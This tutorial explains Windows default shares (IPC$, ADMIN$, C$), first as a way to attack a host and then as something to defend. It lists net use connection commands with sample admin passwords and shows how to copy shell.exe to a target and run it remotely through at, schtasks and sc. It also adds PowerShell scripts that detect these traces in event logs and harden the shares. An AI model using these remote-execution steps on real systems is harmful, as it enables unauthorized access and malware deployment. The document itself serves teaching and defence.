Detailed explanation of the exploitation of Windows default shares


1. Introduction

In Windows, right-click 'My Computer', choose 'Manage', then open 'System Tools → Shared Folders → Shares'. You will see several share names ending in a dollar sign '$'. These are the Windows default shares, that is, resources that Windows shares automatically after installation.


Command line: net share

IPC$ (Internet Process Connection) can be understood as a kind of 'named pipe' (related to the Server service) that establishes a secure channel between the two connected parties and enables access to the remote computer. While Windows NT/2000/XP provide the IPC$ feature, they also enable the default shares when the system is first installed, that is, all logical drive shares (C$, D$, E$ ...) and the system directory share (ADMIN$). The purpose of these shared resources is to make administration easier (only administrators can perform remote operations on them). However, whether intentionally or not, they introduce potential security risks to the system.

At the same time, Microsoft has said this: "The Server service needs to use the default IPC$ system management share. Therefore, you cannot delete this share. We recommend that you do not delete the system management shares created by Windows for the root partitions and volumes (such as C$) and for the system root folder (ADMIN$). Deleting these shares may cause problems for administrators, programs, or services that depend on these shared resources." As long as the Server service ("Server") is running, IPC$ cannot be deleted; attempting to delete it only produces an "Access denied" error message. After you stop the Server service, IPC$ disappears automatically.

All shared resources depend on port 139 or 445.

2. Common share commands

View commands

net use #View connections established by this machine (this machine to other machines)
net session #View connections established to this machine (from other machines); requires administrator privileges

net share command

net share: view the currently enabled shares

net share #View local shared resources
net share ipc$ #Enable ipc$ sharing
net share ipc$ /del #Delete ipc$ sharing
net share admin$ /del #Delete admin$ sharing
net share c$ /del #Delete C disk sharing
net share d$ /del #Delete D disk sharing
net share * /del #Delete all shares

Shares deleted this way are re-created automatically when the computer restarts.

net use connection operations

net use \\192.168.10.15 #Establish an empty ipc connection with 192.168.10.15
net use \\192.168.10.15\ipc$ #Establish an empty ipc connection with 192.168.10.15
net use \\192.168.10.15\ipc$ /u:"" "" #Establish an empty ipc connection with 192.168.10.15

net view \\192.168.10.15 #View the default shares opened by the remote host

net use \\192.168.10.15 /u:"administrator" "root" #Establish an ipc connection with 192.168.10.15 as the administrator
net use \\192.168.10.15 /del #Delete the established ipc connection

Establish a shared connection using a domain account (placeholders in angle brackets):
net use \\192.168.10.15\c$ <domain account password> /user:<domain>\<domain account>

net time \\192.168.10.15 #View the time on the remote host

net use \\192.168.10.15\c$ /u:"administrator" "root" #Establish a shared connection to the C drive
dir \\192.168.10.15\c$ #View the files on the C drive of 192.168.10.15
dir \\192.168.10.15\c$\user #View the user directory under the C drive of 192.168.10.15
dir \\192.168.10.15\c$\user\test.exe #View the test.exe file in the user directory under the C drive of 192.168.10.15
net use \\192.168.10.15\c$ /del #Delete this C drive shared connection

net use k: \\192.168.10.15\c$ /u:"administrator" "root" #Map the target C drive to the local K drive
net use k: /del #Delete this mapping

Establish an empty connection:

Source host:

An empty (null-session) connection is of little use: access is denied.

Destination host:


3. Exploitation of IPC$

This refers to a non-empty (authenticated) connection.

  • Establishing an IPC$ connection with an administrator can execute all the following commands.
  • Establishing an IPC$ connection as a normal user only allows the 'view time' command, 'net time \\192.168.10.131'; other commands cannot be executed.

Connection as ciby, a user in the Administrators group

Unable to access the C drive share

Administrator account connection

1. You can list the c$ directory and execute commands

2. File Management

You can also browse the corresponding files and directories directly in Explorer by entering the path \\192.168.2.130\c$, and you can add, delete, modify and query them there.

3. tasklist command (view processes)

4. at command (scheduled command; can be used to spawn a reverse shell)

View the time on the target system: net time \\192.168.2.130

Copy the specified file in this directory to the target system: copy shell.exe \\192.168.2.130\c$

Create a scheduled task using at: at \\192.168.2.130 14:14:00 C:\shell.exe


Clear the at record: at \\192.168.2.130 <job ID> /delete


Execute with the at command, write the result to a text file on the target, and then view the file's content with the type command: at \\192.168.2.130 14:23:00 cmd.exe /c "ipconfig > c:\1.txt"

View the generated 1.txt file: type \\192.168.10.131\C$\1.txt


5. schtasks (Scheduled Tasks)

The at command has been deprecated since Windows Vista and Windows Server 2008 and has been replaced by the schtasks command, which is more flexible. Using schtasks leaves a log file on the system: C:\Windows\Tasks\SchedLgU.txt


Create a scheduled task named 'test' on the target host, with the program C:\shell.exe, starting with system privileges, and the task will start every minute.

schtasks /create /s 192.168.2.130 /u administrator /p 123.com /tn test /sc MINUTE /mo 1 /tr c:\shell.exe /ru administrator /f


Log entries:

schtasks /create /s 192.168.1.136 /u administrator /p password /tn c /tr c:\shell.exe /sc once /st 14:34

#/s target host /u username /p password /tn task name /tr program path /sc schedule type (frequency) /st start time

Other startup time parameters:

/sc onlogon Start when a user logs on

/sc onstart Start when the system starts

/sc onidle Start when the system is idle

Query this test scheduled task

schtasks /s 192.168.2.130 /u administrator /p 123.com /query | findstr test


Start this test scheduled task

schtasks /run /s 192.168.2.130 /u administrator /p 123.com /i /tn "test"


Delete this test scheduled task

schtasks /delete /s 192.168.2.130 /u administrator /p 123.com /tn "test" /f



6. Create a service using the sc command

copy test.exe \\192.168.10.20\c$

sc \\192.168.10.20 create test binpath= "c:\test.exe"

sc \\192.168.2.130 start test


View the created services


sc \\192.168.2.130 delete test


7. atexec.py in Impacket

The atexec.py script in Impacket uses scheduled tasks to gain execution on the target. It requires the ipc$ share to be enabled and only works on Windows Vista and later. It executes commands on the target host through the Task Scheduler and returns the command output.

Log output:

Enable TaskScheduler logs

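Every technique in sections 4 to 7 (at, schtasks, sc and Impacket atexec) leaves traces in the Windows event logs, and the article's "Enable TaskScheduler logs" step is needed because that log is off by default. The following PowerShell script is an added example, not code from the original article or from Impacket; it enables the Task Scheduler operational log if needed and then lists admin share access, task creation and service installation in the last few hours. The event IDs and field names are the documented Windows ones; the $Hours parameter and the function names are this script's own. Run it in an elevated PowerShell on the host being checked.

```powershell
# Added example, not from the original article: surface the event-log traces left by remote
# use of IPC$/ADMIN$ with at, schtasks, sc and Impacket atexec. Event IDs and EventData field
# names are the documented Windows ones; $Hours and the helper function names are this script's own.
param([int]$Hours = 24)

$since = (Get-Date).AddHours(-$Hours)
$tsLog = 'Microsoft-Windows-TaskScheduler/Operational'

# The Task Scheduler operational log is disabled by default; events 106 (task registered) and
# 200/201 (action started/completed) are only written once it is enabled.
if (-not (Get-WinEvent -ListLog $tsLog).IsEnabled) {
    wevtutil sl $tsLog /e:true
    Write-Host "Enabled $tsLog; task registrations will be recorded from now on."
}

function Get-Events($Log, [int[]]$Ids) {
    Get-WinEvent -FilterHashtable @{ LogName = $Log; Id = $Ids; StartTime = $since } -ErrorAction SilentlyContinue
}

function ConvertTo-Map($Event) {
    # Flatten <EventData><Data Name="..">..</Data> into a hashtable for field access by name
    $map = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $map[$d.Name] = $d.'#text' }
    $map
}

$findings = @()

# Security 5140: a network share object was accessed (needs "Audit File Share" success auditing).
# Every technique in the article starts with a connection to IPC$, ADMIN$ or a drive share.
foreach ($e in Get-Events 'Security' 5140) {
    $m = ConvertTo-Map $e
    if ($m.ShareName -match '^\\\\\*\\(IPC|ADMIN|[A-Z])\$$') {
        $findings += [pscustomobject]@{ Time = $e.TimeCreated; Kind = 'AdminShareAccess'
            Detail = "$($m.ShareName) from $($m.IpAddress) as $($m.SubjectDomainName)\$($m.SubjectUserName)" }
    }
}

# Security 4698: a scheduled task was created (needs "Audit Other Object Access Events").
# Covers at, 'schtasks /create' and atexec, which registers a task with a randomly generated name.
foreach ($e in Get-Events 'Security' 4698) {
    $m = ConvertTo-Map $e
    $findings += [pscustomobject]@{ Time = $e.TimeCreated; Kind = 'TaskCreated'
        Detail = "$($m.TaskName) by $($m.SubjectDomainName)\$($m.SubjectUserName)" }
}

# TaskScheduler operational 106: the same task registration, seen from the scheduler's own log.
foreach ($e in Get-Events $tsLog 106) {
    $m = ConvertTo-Map $e
    $findings += [pscustomobject]@{ Time = $e.TimeCreated; Kind = 'TaskRegistered'
        Detail = "$($m.TaskName) by $($m.UserContext)" }
}

# System 7045: a service was installed. 'sc \\host create' lands here; the image path shows the
# binary that was copied over, so a path directly under a drive root (c:\test.exe) stands out.
foreach ($e in Get-Events 'System' 7045) {
    $m = ConvertTo-Map $e
    $findings += [pscustomobject]@{ Time = $e.TimeCreated; Kind = 'ServiceInstalled'
        Detail = "$($m.ServiceName) -> $($m.ImagePath) (runs as $($m.AccountName))" }
}

$findings | Sort-Object Time | Format-Table -AutoSize -Wrap
```

A share access from a remote address followed within seconds by a task creation or service installation on the same host is the sequence that at, schtasks, sc and atexec all produce; correlating on the Time column is usually enough to pick it out of routine administration.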

4. Methods to close sharing

In addition to deleting with 'net share * /del', there are many other ways to stop sharing, such as modifying the registry or disabling the Server service; choose whichever method suits your environment.
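Two points above are worth turning into a check: section 2 notes that shares removed with 'net share x$ /del' come back after a restart, and this section says the registry or the Server service can stop them for good. The PowerShell script below is an added example, not code from the original article; it reports the default shares and the settings that control them, and with the -Harden switch (this script's own parameter) applies the registry fix. The registry paths and value names (AutoShareWks, AutoShareServer, RestrictNullSessAccess, LocalAccountTokenFilterPolicy) and the SmbShare cmdlets are documented Windows ones. LocalAccountTokenFilterPolicy is included because its default (absent or 0) is the likely reason the Administrators-group user ciby in section 3 was denied C$ while the built-in Administrator was not: local administrators other than the built-in account receive a filtered token over the network. Keeping that default is part of the hardening. Run in an elevated PowerShell.

```powershell
# Added example, not from the original article: audit the Windows default shares and the
# settings that control them, and optionally harden them. Run in an elevated PowerShell.
# Registry paths/value names and the *-SmbShare cmdlets are documented Windows ones;
# the -Harden switch is this script's own assumption.
param([switch]$Harden)

$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$uacPol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-RegValue($Path, $Name) {
    # Returns $null when the value is absent, so the report distinguishes "unset" from "set to 0"
    (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
}

Write-Host '== Default ($) shares currently offered by this host =='
Get-SmbShare | Where-Object { $_.Name -like '*$' } |
    Select-Object Name, Path, Special | Format-Table -AutoSize

Write-Host '== Settings that govern them =='
[pscustomobject]@{
    # 0 stops C$, D$, ... and ADMIN$ from being re-created each time the Server service starts;
    # 'net share c$ /del' alone is undone at the next reboot. Absent means 1 (enabled).
    AutoShareWks    = Get-RegValue $lanman 'AutoShareWks'      # workstation editions
    AutoShareServer = Get-RegValue $lanman 'AutoShareServer'   # server editions
    # 1 (the default) denies anonymous (null-session) access to pipes and shares through IPC$
    RestrictNullSessAccess = Get-RegValue $lanman 'RestrictNullSessAccess'
    # absent or 0 (the default) = remote UAC token filtering on: local accounts in Administrators
    # other than the built-in Administrator get a filtered token over SMB and cannot use C$/ADMIN$
    LocalAccountTokenFilterPolicy = Get-RegValue $uacPol 'LocalAccountTokenFilterPolicy'
    # IPC$ exists for as long as this service runs; stopping it removes SMB sharing entirely
    ServerService = (Get-Service -Name LanmanServer).Status
} | Format-List

if ($Harden) {
    Set-ItemProperty -Path $lanman -Name AutoShareWks    -Value 0 -Type DWord
    Set-ItemProperty -Path $lanman -Name AutoShareServer -Value 0 -Type DWord
    # Remove the drive and ADMIN$ shares now; with AutoShare* = 0 they do not return after restart.
    # IPC$ is left alone: as the article notes, it cannot be deleted while the Server service runs.
    Get-SmbShare | Where-Object { $_.Special -and $_.Name -ne 'IPC$' } |
        ForEach-Object { Remove-SmbShare -Name $_.Name -Force }
    Write-Host 'Administrative shares removed and AutoShare* set to 0.'
}
```

Run it without -Harden first: a host that shows AutoShareWks/AutoShareServer unset and LocalAccountTokenFilterPolicy set to 1 is exposed to exactly the administrator-level techniques described in section 3. Disabling the Server service (LanmanServer) is the heavier option the article mentions and also stops legitimate file sharing from the host, so the AutoShare* values are normally the better first step.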
